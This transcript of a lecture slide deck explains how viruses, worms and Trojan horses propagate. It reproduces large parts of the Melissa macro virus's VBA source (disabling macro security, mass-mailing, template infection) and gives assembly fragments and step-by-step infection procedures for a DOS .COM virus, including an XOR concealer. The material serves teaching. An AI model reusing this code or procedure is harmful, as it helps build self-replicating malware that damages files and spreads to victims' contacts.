1 / 37

Viruses, Trojan Horses, and Worms

Viruses, Trojan Horses, and Worms. Propagation of malicious code Malicious indicates the potential to do damage. Usually classified by the type of propagation. Sometimes classified by Platforms and mechanisms it requires to run E.g. macro viruses.

alain
Télécharger la présentation

Viruses, Trojan Horses, and Worms

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Viruses, Trojan Horses, and Worms

  2. Propagation of malicious code • Malicious indicates the potential to do damage. • Usually classified by the type of propagation. • Sometimes classified by • Platforms and mechanisms it requires to run • E.g. macro viruses. • Virus/Trojan/worm may not actually cause damages.

  3. Viruses • Program or piece of code that will reproduce itself. • Sometimes perform a particular action. • Definition from RFC 1135 • A virus is a piece of code that inserts itself into a host, including operating systems, to propagate. It cannot run independently. It requires that its host program be run to activate it.

  4. Worm • A worm is similar to a virus, but it does not locally reproduce. • Propagates between systems only. • Definition from RFC 1135 • A worm is a program that can run independently, will consume the resources of its host from within in order to maintain itself and can propagate a complete working version of itself on to other machines.

  5. Macro Virus • Sometimes considered worms. • Require a host program to process/run it in order for it to execute. • Often written in VBA (Visual Basic for Application) for Word, Access, Excel, PowerPoint, and outlook etc. • E.g. Melissa

  6. Trojan Horses • Code disguised as benign programs, but behave in an unexpected, usually malicious manner. • User needs to be convinced to accept/run them. • E.g. Pokemon worm, which will display animated pictures of bouncing Pikachu on your screen while it e-mails itself to everyone in your address book and prepares to delete every files.

  7. The Trojan horses initially appears as an e-mail with the title "Pikachu Pokemon" and the English message "Pikachu is your friend”. The above picture is what the users see when executing pokemon.exe (its attachment). What they don’t see is the application e-mailing itself and deleting files from the system.

  8. Anatomy of a Virus • Two primary components • Propagation mechanism • Payload • Propagation • Method by which the virus spreads itself. • Old days: single PC, transferred to other hosts by ways of floppy diskettes. • Nowadays: internet.

  9. Types of Propagation • Parasitic • Propagates by being a parasite on other files. • Attaching itself in some manner that still leaves the original file usable. • .com and .exe files of MS-DOS • Macro virus • Boot sector infectors • Copy themselves to the bootable portion of the hard (or floppy) disk. • The virus gain control when the system is booted.

  10. Normal boot procedure • It first goes through its usual POST • Power On Self Test • BIOS (Basic Input/Output System) does what is referred to a as bootstrap • Checking for a valid bootable disk • For a hard drive to be bootable, it must contain a Master Boot Record (MBR). • Chuck of code that lies at the beginning of the hard drive. • Understand the partition table.

  11. The MBR code will look for a particular partition that is marked bootable (MSDOS fdisk: active), and then transfer control to the code. • This code is known as the boot sector. • Viruses have two opportunities to take control. • Insert themselves into the MBR position • They can gain control under all situations • At the expense of having to deal with reading and booting via the partition table.

  12. Insert themselves into the boot sector of a partition • Boot sector viruses tend to take the existing MBR or boot sector code, relocate it elsewhere, and then insert themselves into the record. • When the system boots, they can do their things, and then transfer control the the relocated code that they replaced.

  13. Multi-partite • Refers to viruses that can use multiple means of infection, such as • MBR • Boot sector • Parasitic

  14. Payload • Refers to what the virus does (besides propagation) once executed. • Do nothing • Do cute things • Malicious damage such as delete your partition table. • Some viruses have a particular trigger. • Date • Number of successful infections

  15. Smart viruses usually use infrequent trigger so that they have ample time to ensure they have properly propagated, before alerting the users.

  16. Case Study I: Melissa • Melissa works by infecting the Document_Open() macro of Microsoft word. • Run immediately when the user opens the word files. Private Sub document_open() On Error Resume Next

  17. If System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& Else p$ = "clone" CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If • Disable the macro security features

  18. MAPI stands for “Messaging API”, a way for Windows applications to interface with various e-mail functionalities. • A way to tell if it has already infected the host. Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("", "HKEY_CURRENT_USER\ Software\Microsoft\Office\", "<B style="color:black;background-color:#ffff66"> Melissa</B>?") <> "... by Kwyjibo" Then

  19. To see if the application is outlook • Compose of a list of the first 50 email addresses from the address book If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo

  20. BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send • Actually send emails • Wrap up Peep = "" Next y DasMapiName.Logoff End If p$ = "clone" System.PrivateProfileString("", "HKEY_CURRENT_USER \Software\Microsoft\Office\", "<B style= "color:black;background-color:#ffff66">Melissa</B>?") = "... by Kwyjibo" End If

  21. Check to see if the active document and document template are infected. • Infect it.

  22. Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "<B style="color:black;background-color:#ffff66">Melissa</B>" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "<B style="color:black;background-color:#ffff66">Melissa</B>" DoAD = True End If If NTI1.Name <> "<B style="color:black;background-color:#ffff66">Melissa</B>" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "<B style="color:black;background-color:#ffff66">Melissa</B>" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA

  23. Modifying the Document_Open() and Document_Close() function of the active document. • Every new document created, upon closing or saving will run the Melissa worm. • Saving the current document.

  24. Case Study: .com Virus • A .com virus may be divided into three parts. • Replicator • Concealer • Bomb (payload)

  25. Replicator • Spread the virus. • Copy rest of the code at the end. P1 P2 V1 V2 The uninfected file The virus code P1 P2 P1

  26. Copy small portion of its code to the beginning of the file. • Copy the second part of itself to the end of the file. • What do V1 and V2 do? • V1 transfers control of the program to V2. V1 P2 P1 V2

  27. JMP FAR PTR Duh ; Takes four bytes Duh DW V2_Start ; Takes two bytes • The code to do this is simple: • The value of Duh must be changed to reflect the length of the file that is infected. • Dup = length of V1+ original size of the inflect file+ 256 (to account for the start position). • E.g. if file size = 79 and V1=6 • Dup = 6+79+256 = 341. • Another approach DB 1101001b ; Code for JMP ; (2 byte-displacement) Duh DW V2_Start - OFFSET Duh ; 2 byte displacement

  28. V2 contains the rest of the code. • The last part of V2 copies P1 over V1 (in memory) and then transfers the control to the beginning of the file (in memory). MOV SI, V2_START ; V2_START is a LABEL marking ; where V2 starts SUB SI, V1_LENGTH ; Go back to where P1 is stored MOV DI, 0100h ; All COM files are loaded @ ; CS:[100h] in memory MOV CX, V1_LENGTH ; Move CX bytes REP MOVSB ; DS:[SI] -> ES:[DI] MOV DI, 0100h JMP DI

  29. The code assume that P1 is located just before V2. • It also assumes ES equals to CS. If these assumptions are false, we can change it accordingly. PUSH CS ; Store CS POP ES ; and move it to ES ; Note MOV ES, CS is not a ; valid instruction MOV SI, P1_START ; Move from wherever P1 is stored MOV DI, 0100h ; to CS:[100h] MOV CX, V1_LENGTH REP MOVSB MOV DI, 0100h JMP DI

  30. The code first moves CS into ES. • Then sets the source pointer of MOVSB to where P1 is located. • Note that the offset of P1 is 100h higher than the physical file location, as COM files are loaded starting from CS:[100h]. • Infecting .EXE file is much more complicated.

  31. Replicator portion • Steps • Find a file to infect. • Check if it is already infected. • If so, go back to 1 • Infect it. • If infected enough, quit • Otherwise, go back to 1 • Finding a file to infect • Write a directory traversal procedure • Issuing FINDFIRST and FINDNEXT calls

  32. Once you find the file, open it and read the first few bytes. If they are the same as the first few bytes of V1, then the file is already infected. • Infection should take the following steps: • Change the file attributes to nothing. • Save the file date/time stamps. • Close the file. • Open it again in read/write mode. • Save P1 and append it to the end of the file. • Copy V1 to the beginning, but change the offset which it JMPs to so it transfers control correctly. • Append V2 to the end of the file. • Restore file attributes /date/time.

  33. mov ah,3Fh ; Read first three mov cx, 3 ; bytes of the file lea dx, [bp+offset buffer] ; to the buffer int 21h mov ax, 4202h ; SEEK from EOF xor cx, cx ; DX:CX = offset xor dx, dx ; Returns filesize int 21h ; in DX:AX sub ax, virus_size + 3 cmp word ptr [bp+offset buffer+1], ax jnz infect_it bomb_out: mov ah, 3Eh ; else close the file int 21h ; and go find another Sample code to Check if the file has been infected.

  34. Concealer • Conceals the program from notice by the everyday user and virus scanner. • A simple XOR encryption: encrypt_val db ? decrypt: encrypt: mov ah, encrypt_val mov cx, part_to_encrypt_end - part_to_encrypt_start mov si, part_to_encrypt_start mov di, si xor_loop: lodsb ; DS:[SI] -> AL xor al, ah stosb ; AL -> ES:[DI] loop xor_loop ret

  35. Bomb • Does all nasty things to annoy the user. • Some possible bombs • System slowdown • Easily handled by trapping an interrupt and causing a delay when it activates. • File deletion. • Message Display. • Killing/Replacing the partition table or boot sector of the hard drive.

  36. Anti-virus Techniques • Integrity/behavioral Checkers • Use good OS • Use virus scanner on computer and email-server. • Use virus scanner • Do not open attachments to emails. • Frequent backups.

  37. Reference • Kevin L. Poulsen, "Hack Proofing Your Network: Internet Tradecraft", Chapter 14, p.383 – 405 • Dark Angel’s Phunky Virus Writing Guide http://www.sirkussystem.com/virus.html • Introduction • Installment II: the replicator

More Related